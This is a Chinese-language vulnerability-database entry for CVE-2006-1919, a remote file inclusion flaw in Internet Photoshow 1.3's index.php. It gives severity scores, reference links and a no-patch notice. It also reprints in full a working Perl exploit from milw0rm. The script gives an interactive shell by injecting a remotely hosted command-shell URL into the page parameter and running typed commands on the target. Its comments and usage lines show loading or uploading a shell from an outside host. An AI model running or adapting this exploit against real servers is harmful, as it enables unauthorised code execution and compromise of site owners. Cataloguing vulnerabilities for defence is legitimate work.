CVE-2006-1919
CVSS7.5
发布时间 :2006-04-20 14:06:00
修订时间 :2011-03-07 21:34:32
NMCOE    

[原文]PHP remote file inclusion vulnerability in index.php in Internet Photoshow 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.


[CNNVD]Internet Photoshow Index.PHP 远程文件包含漏洞 (CNNVD-200604-370)

        Internet Photoshow 1.3中的index.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于page参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1919
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1919
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-370
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1417
(UNKNOWN)  VUPEN  ADV-2006-1417
http://secunia.com/advisories/19726
(VENDOR_ADVISORY)  SECUNIA  19726
http://milw0rm.com/exploits/1694
(UNKNOWN)  MILW0RM  1694
http://xforce.iss.net/xforce/xfdb/25937
(UNKNOWN)  XF  ip-index-file-include(25937)
http://www.securityfocus.com/bid/17620
(UNKNOWN)  BID  17620
http://www.osvdb.org/24743
(UNKNOWN)  OSVDB  24743

- 漏洞信息

Internet Photoshow Index.PHP 远程文件包含漏洞
高危 输入验证
2006-04-20 00:00:00 2006-04-24 00:00:00
远程  
        Internet Photoshow 1.3中的index.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于page参数中的URL执行任意PHP代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.thomas-voecking.de/thomas/index.php?content=photoshow
        

- 漏洞信息 (1694)

Internet PhotoShow (page) Remote File Inclusion Exploit (EDBID:1694)
php webapps
2006-04-18 Verified
0 Hessam-x
N/A [点击下载]
#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# sub usage()
# {
 #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n";
 #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd";
 #exit();
 #}
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
#  Internet PhotoShow Remote File Inclusion Exploit  #
######################################################
# upload a shell with this xpl:
# wget http://shell location/
use LWP::UserAgent;
print "-------------------------------------------\n";
print "=             Internet PhotoShow          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";


$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}



while()
{
       print "Hessam-x@PhotoShow \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n";

$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)
       {print "\n[-] Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n[-] Invalid Command\n"}

if($return =~ /(.*)/)


{
       $freturn = $1;
       $freturn=~ tr/[ê]/[\n]/;
       print "\r\n$freturn\n\r";
       last;
}

else {print "Hessam-x@PhotoShow \$";}}}last;


sub usage()
 {
print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n";
print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n";
 exit();
 }

# milw0rm.com [2006-04-18]
		

- 漏洞信息

24743
Internet Photoshow index.php page Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Internet Photoshow contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the 'page' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-18 Unknow
2006-04-18 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站